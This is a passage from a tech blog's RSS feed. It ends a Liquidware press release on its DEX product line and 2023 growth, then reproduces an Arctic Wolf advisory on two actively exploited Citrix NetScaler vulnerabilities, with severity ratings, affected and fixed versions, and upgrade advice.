href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Fwww.ervik.as%2Fliquidware-continues-to-define-the-dex-landscape-a-year-of-pioneering-achievements-in-2023%2F&amp;linkname=Liquidware%20Continues%20to%20Define%20the%20DEX%20Landscape%3A%20A%20Year%20of%20Pioneering%20Achievements%20in%202023" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fwww.ervik.as%2Fliquidware-continues-to-define-the-dex-landscape-a-year-of-pioneering-achievements-in-2023%2F&amp;linkname=Liquidware%20Continues%20to%20Define%20the%20DEX%20Landscape%3A%20A%20Year%20of%20Pioneering%20Achievements%20in%202023" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fwww.ervik.as%2Fliquidware-continues-to-define-the-dex-landscape-a-year-of-pioneering-achievements-in-2023%2F&amp;linkname=Liquidware%20Continues%20to%20Define%20the%20DEX%20Landscape%3A%20A%20Year%20of%20Pioneering%20Achievements%20in%202023" title="Email" rel="nofollow noopener" target="_blank"></a></p>
<figure class="wp-block-image size-full"><img src="data:image/svg+xml,%3Csvg%20xmlns=%27http://www.w3.org/2000/svg%27%20width='400'%20height='131'%20viewBox=%270%200%20400%20131%27%3E%3C/svg%3E" loading="lazy" data-lazy="1" decoding="async" width="400" height="131" data-tf-src="http://www.ervik.as/wp-content/uploads/2017/08/liquidware-logo.png" alt="Liquidware DEX" class="tf_svg_lazy wp-image-6407" data-tf-srcset="https://www.ervik.as/wp-content/uploads/2017/08/liquidware-logo.png 400w, https://www.ervik.as/wp-content/uploads/2017/08/liquidware-logo-300x98.png 300w" data-tf-sizes="(max-width: 400px) 100vw, 400px" /><noscript><img decoding="async" width="400" height="131" data-tf-not-load src="http://www.ervik.as/wp-content/uploads/2017/08/liquidware-logo.png" alt="Liquidware DEX" class="wp-image-6407" srcset="https://www.ervik.as/wp-content/uploads/2017/08/liquidware-logo.png 400w, https://www.ervik.as/wp-content/uploads/2017/08/liquidware-logo-300x98.png 300w" sizes="(max-width: 400px) 100vw, 400px" /></noscript></figure>



<h2 class="wp-block-heading">Liquidware, a recognized authority in Digital Employee Experience ( DEX ) solutions for digital workspaces, proudly announces a year of exceptional growth and continued innovation. The company celebrates a 74% increase in Annual Recurring Revenue (ARR) and an 80% growth in enterprise adoption of its FlexApp technology. </h2>



<p>Liquidware offers the most comprehensive DEX coverage compared to other vendors. The company’s innovative solutions manage DEX using ProfileUnity, deliver it through FlexApp&#8217;s dynamic applications, monitor it with Stratusphere UX, and control it using CommandCTRL.&nbsp;</p>



<p>Gartner forecasts that the DEX tool market will reach $476.8 million by the end of 2023 and grow at a compound annual rate of 17.3% through 2027, based on constant currency.1&nbsp;</p>



<p>&#8220;As we reflect on the strides made in 2023, it&#8217;s evident that this was a year of remarkable growth and significant achievements for Liquidware in key areas of EUC (End User Computing),&#8221; said Chris Akerberg, President and COO of Liquidware.&nbsp;</p>



<p>2023 was marked by several key achievements for Liquidware:&nbsp;</p>



<ul class="wp-block-list">
<li><strong>Launch of &#8216;CommandCTRL&#8217;</strong>: Liquidware introduced this cutting-edge SaaS product, enhancing its DEX solutions with real-time remediation and integrated AI. Featuring a 7-day DVR playback for DEX analysis, CommandCTRL garnered attention and accolades, winning the VMware Explore Finalist award and being recognized as a Redmond Magazine Product of the Year.&nbsp;</li>



<li><strong>Launch and Expansion of the &#8216;Liquidware Ready&#8217; Program</strong>: Enhancing the confidence of partners and customers in choosing digital employee experience solutions compatible with Liquidware’s technologies. Microsoft, Citrix, VMware, and Dizzion FRAME were designated strategic platform partners while Application Readiness, IGEL, Nerdio, Stratodesk, Rimo3, and 10ZiG were awarded Liquidware Ready Verified status.&nbsp;&nbsp;</li>



<li><strong>Advancements in FlexApp One</strong>: The release of ProfileUnity with FlexApp version 6.8.6, brought about significant offline capabilities with FlexApp One, OAuth support, and performance enhancements, enhancing application portability and deployment across diverse Windows workspaces.&nbsp;</li>



<li><strong>Strategic Growth through Partnerships</strong>: Broadening the impact and reach of Liquidware&#8217;s FlexApp One technology in the digital workspace management sector, several third parties announced or neared integration. Broad and growing Stratusphere UX support for ServiceNow and thin clients continued to assert Stratusphere UX as a leader in DEX monitoring and optimization.&nbsp;&nbsp;</li>
</ul>



<p>Andy Whiteside, President and CEO of XenTegra, a Liquidware partner, commented saying, “In a dynamic market shaped by significant shifts, <a href="https://www.ervik.as/category/user-virtualization/liquidware/">Liquidware</a> shines. Their solutions cover the four critical phases of Digital Employee Experience, making them adaptable to customer needs during times of transformation. Liquidware continues to empower enterprises to excel in today&#8217;s dynamic digital workspaces, and we&#8217;re excited about the journey ahead. Their success and mission continue to align with XenTegra&#8217;s commitment to empowering enterprises in the digital workspace.” </p>



<p>Akerberg continued, &#8220;In a landscape where many focus on singular aspects of DEX, Liquidware stands apart. We offer a holistic approach, delivering comprehensive solutions that encompass all critical components of DEX — from delivery and management to monitoring and control. Our commitment to these four pillars empowers modern enterprises to thrive in today&#8217;s dynamic digital workspace environments.&#8221;&nbsp;</p>



<p>For more information about Liquidware and its range of solutions, please visit&nbsp;<a href="https://pages.liquidware.com/MTMyLUZPSi0zNDQAAAGRHbEhejCcLCVgieUpOGSgJG-ym4nBsb6TF910lwghGsKWXZGNwvJfnI4aplYCyuti2ak5Bi0=" target="_blank" rel="noreferrer noopener">Liquidware&#8217;s website</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>DoS and RCE Vulnerabilities Exploited in Citrix NetScaler ADC and NetScaler Gateway multiple CVE´s</title>
		<link>https://www.ervik.as/dos-and-rce-vulnerabilities-exploited-in-citrix-netscaler-adc-and-netscaler-gateway-multiple-cves/</link>
		
		<dc:creator><![CDATA[Alexander Ervik Johnsen]]></dc:creator>
		<pubDate>Thu, 01 Feb 2024 08:19:08 +0000</pubDate>
				<category><![CDATA[Citrix]]></category>
		<category><![CDATA[NetScaler]]></category>
		<category><![CDATA[Citrix Bleed]]></category>
		<category><![CDATA[CVE]]></category>
		<category><![CDATA[NetScaler ADC]]></category>
		<category><![CDATA[NetScaler Gateway]]></category>
		<guid isPermaLink="false">https://www.ervik.as/?p=24517</guid>

					<description><![CDATA[On January 16, 2024, Citrix published a&#160;security bulletin&#160;disclosing two zero-day vulnerabilities (CVE-2023-6548 &#38; CVE-2023-6549) being actively exploited in Citrix NetScaler ADC and NetScaler Gateway. CVE-2023-6548 CVSS 5.5 – Medium Actively Exploited? Code injection vulnerability on the Management Interface can result in authenticated Remote Code Execution (RCE) for low-privileged threat actors.·&#160;&#160;&#160;&#160;&#160;&#160; Pre-requisite: Access to NSIP, CLIP [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fwww.ervik.as%2Fdos-and-rce-vulnerabilities-exploited-in-citrix-netscaler-adc-and-netscaler-gateway-multiple-cves%2F&amp;linkname=DoS%20and%20RCE%20Vulnerabilities%20Exploited%20in%20Citrix%20NetScaler%20ADC%20and%20NetScaler%20Gateway%20multiple%20CVE%C2%B4s" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_bluesky" href="https://www.addtoany.com/add_to/bluesky?linkurl=https%3A%2F%2Fwww.ervik.as%2Fdos-and-rce-vulnerabilities-exploited-in-citrix-netscaler-adc-and-netscaler-gateway-multiple-cves%2F&amp;linkname=DoS%20and%20RCE%20Vulnerabilities%20Exploited%20in%20Citrix%20NetScaler%20ADC%20and%20NetScaler%20Gateway%20multiple%20CVE%C2%B4s" title="Bluesky" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fwww.ervik.as%2Fdos-and-rce-vulnerabilities-exploited-in-citrix-netscaler-adc-and-netscaler-gateway-multiple-cves%2F&amp;linkname=DoS%20and%20RCE%20Vulnerabilities%20Exploited%20in%20Citrix%20NetScaler%20ADC%20and%20NetScaler%20Gateway%20multiple%20CVE%C2%B4s" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Fwww.ervik.as%2Fdos-and-rce-vulnerabilities-exploited-in-citrix-netscaler-adc-and-netscaler-gateway-multiple-cves%2F&amp;linkname=DoS%20and%20RCE%20Vulnerabilities%20Exploited%20in%20Citrix%20NetScaler%20ADC%20and%20NetScaler%20Gateway%20multiple%20CVE%C2%B4s" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fwww.ervik.as%2Fdos-and-rce-vulnerabilities-exploited-in-citrix-netscaler-adc-and-netscaler-gateway-multiple-cves%2F&amp;linkname=DoS%20and%20RCE%20Vulnerabilities%20Exploited%20in%20Citrix%20NetScaler%20ADC%20and%20NetScaler%20Gateway%20multiple%20CVE%C2%B4s" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fwww.ervik.as%2Fdos-and-rce-vulnerabilities-exploited-in-citrix-netscaler-adc-and-netscaler-gateway-multiple-cves%2F&amp;linkname=DoS%20and%20RCE%20Vulnerabilities%20Exploited%20in%20Citrix%20NetScaler%20ADC%20and%20NetScaler%20Gateway%20multiple%20CVE%C2%B4s" title="Email" rel="nofollow noopener" target="_blank"></a></p>
<figure class="wp-block-image size-full"><img src="data:image/svg+xml,%3Csvg%20xmlns=%27http://www.w3.org/2000/svg%27%20width='860'%20height='520'%20viewBox=%270%200%20860%20520%27%3E%3C/svg%3E" loading="lazy" data-lazy="1" style="background:linear-gradient(to right,#000000 25%,#000000 25% 50%,#000000 50% 75%,#000000 75%),linear-gradient(to right,#000306 25%,#b80000 25% 50%,#b70100 50% 75%,#b80000 75%),linear-gradient(to right,#030303 25%,#b80000 25% 50%,#b80000 50% 75%,#010302 75%),linear-gradient(to right,#050505 25%,#050505 25% 50%,#050505 50% 75%,#050505 75%)" decoding="async" width="860" height="520" data-tf-src="https://www.ervik.as/wp-content/uploads/2024/02/citrix-bleed.jpeg" alt="CVE-2023-6548 &amp; CVE-2023-6549: DoS and RCE Vulnerabilities Exploited in Citrix NetScaler ADC and NetScaler Gateway" class="tf_svg_lazy wp-image-24518" data-tf-srcset="https://www.ervik.as/wp-content/uploads/2024/02/citrix-bleed.jpeg 860w, https://www.ervik.as/wp-content/uploads/2024/02/citrix-bleed-300x181.jpeg 300w, https://www.ervik.as/wp-content/uploads/2024/02/citrix-bleed-768x464.jpeg 768w" data-tf-sizes="(max-width: 860px) 100vw, 860px" /><noscript><img decoding="async" width="860" height="520" data-tf-not-load src="https://www.ervik.as/wp-content/uploads/2024/02/citrix-bleed.jpeg" alt="CVE-2023-6548 &amp; CVE-2023-6549: DoS and RCE Vulnerabilities Exploited in Citrix NetScaler ADC and NetScaler Gateway" class="wp-image-24518" srcset="https://www.ervik.as/wp-content/uploads/2024/02/citrix-bleed.jpeg 860w, https://www.ervik.as/wp-content/uploads/2024/02/citrix-bleed-300x181.jpeg 300w, https://www.ervik.as/wp-content/uploads/2024/02/citrix-bleed-768x464.jpeg 768w" sizes="(max-width: 860px) 100vw, 860px" /></noscript></figure>



<h2 class="wp-block-heading">On January 16, 2024, Citrix published a&nbsp;<a href="https://support.citrix.com/article/CTX584986/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20236548-and-cve20236549" target="_blank" rel="noopener">security bulletin</a>&nbsp;disclosing two zero-day vulnerabilities (CVE-2023-6548 &amp; CVE-2023-6549) being actively exploited in Citrix NetScaler ADC and NetScaler Gateway.</h2>



<figure class="wp-block-table"><table><tbody><tr><td><strong>CVE-2023-6548</strong></td><td colspan="2"><strong>CVSS 5.5 – Medium</strong></td><td><strong>Actively Exploited?</strong></td></tr><tr><td colspan="3">Code injection vulnerability on the Management Interface can result in authenticated Remote Code Execution (RCE) for low-privileged threat actors.·&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Pre-requisite: Access to NSIP, CLIP or SNIP with management interface access is required by threat actors to exploit this vulnerability</td><td>Yes</td></tr><tr><td colspan="2"><strong>CVE-2023-6549</strong></td><td><strong>CVSS 8.2 – High</strong></td><td><strong>Actively Exploited?</strong></td></tr><tr><td colspan="3">Buffer overflow vulnerability that can lead to a Denial of Service (DoS).·&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Pre-requisite: To be susceptible to Denial of Service (DoS) attacks, the appliances must be set up either as a gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or as an AAA virtual server.</td><td>Yes</td></tr></tbody></table></figure>



<p>Specifics of the exploitation observed by Citrix have not been revealed and Arctic Wolf has not identified any public Proof of Concept (PoC) exploits. However, we assess more threat actors are likely to target these vulnerabilities in the near-term due to the potential level of access they can obtain once compromising an appliance. Threat actors have also previously exploited several vulnerabilities targeting Citrix NetScaler ADC and NetScaler Gateway. Most notably in late 2023, nation-state and ransomware threat actors exploited the information disclosure vulnerability&nbsp;<a href="https://arcticwolf.com/resources/blog/cve-2023-4966-critical-data-exposure-vulnerability-in-citrix-netscaler-adc-and-citrix-netscaler-gateway/" target="_blank" rel="noopener">CVE-2023-4966 (Citrix Bleed)</a>&nbsp;against several high profile organizations.</p>



<p>Although there is currently no evidence linking these vulnerabilities directly to Citrix Bleed, Arctic Wolf will continue to closely monitor the situation for any emerging threats or developments.</p>



<p><strong>This bulletin only applies to customer-managed NetScaler ADC and NetScaler Gateway products. Customers using Citrix-managed cloud services or Citrix-managed Adaptive Authentication do not need to take any action.</strong></p>



<h2 class="wp-block-heading">Recommendation</h2>



<h3 class="wp-block-heading">Upgrade Citrix NetScaler ADC and NetScaler Gateway to Fixed Version</h3>



<p>Arctic Wolf&nbsp;<strong>strongly recommends</strong>&nbsp;upgrading Citrix NetScaler ADC and NetScaler Gateway their respective fixed versions.</p>



<figure class="wp-block-table"><table><tbody><tr><td><strong>Product</strong></td><td><strong>Affected Versions</strong></td><td><strong>Fixed Versions</strong></td></tr><tr><td>Citrix NetScaler ADC</td><td>·&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 14.1 before 14.1-12.35·&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  13.1 before 13.1-51.15·&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 13.0 before 13.0-92.21·&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 13.1-FIPS before 13.1-37.176·&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 12.1-FIPS before 12.1-55.302·&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 12.1-NDcPP before 12.1-55.302</td><td>·&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 14.1-12.35 and later releases·&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  13.1-51.15 and later releases of 13.1·&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 13.0-92.21 and later releases of 13.0·&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 13.1-FIPS 13.1-37.176 and later releases of 13.1-FIPS·&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 12.1-FIPS 12.1-55.302 and later releases of 12.1-FIPS·&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 12.1-NDcPP 12.1-55.302 and later releases of 12.1-NDcPP</td></tr><tr><td>Citrix NetScaler Gateway</td><td>·&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 14.1 before 14.1-12.35·&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  13.1 before 13.1-51.15·&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 13.0 before 13.0-92.21</td><td>·&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 14.1-12.35 and later releases·&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  13.1-51.15 and later releases of 13.1·&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 13.0-92.21 and later releases of 13.0</td></tr></tbody></table></figure>



<p><strong>Note:</strong>&nbsp;Citrix NetScaler ADC and NetScaler Gateway version 12.1 has reached its End of Life (EOL). We strongly advise customers to proceed with upgrading their appliances to a supported version that addresses the existing vulnerabilities.</p>



<p>Please follow your organization’s patching and testing guidelines to avoid operational impact.</p>



<h3 class="wp-block-heading">References</h3>



<ol class="wp-block-list">
<li><a href="https://support.citrix.com/article/CTX584986/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20236548-and-cve20236549" target="_blank" rel="noopener">Citrix Article</a></li>



<li><a href="https://www.cisa.gov/news-events/alerts/2024/01/17/cisa-adds-three-known-exploited-vulnerabilities-catalog" target="_blank" rel="noopener">CISA Adds Vulnerabilities to KEV</a></li>



<li><a href="https://arcticwolf.com/resources/blog/cve-2023-4966-critical-data-exposure-vulnerability-in-citrix-netscaler-adc-and-citrix-netscaler-gateway/" target="_blank" rel="noopener">Arctic Wolf Blog (CVE-2023-4966)</a></li>
</ol>



<p><a href="https://arcticwolf.com/resources/blog/cve-2023-6548-cve-2023-6549-dos-and-rce-vulnerabilities-exploited-in-citrix-netscaler-adc-and-netscaler-gateway/" data-type="link" data-id="https://arcticwolf.com/resources/blog/cve-2023-6548-cve-2023-6549-dos-and-rce-vulnerabilities-exploited-in-citrix-netscaler-adc-and-netscaler-gateway/" target="_blank" rel="noopener">Source</a></p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
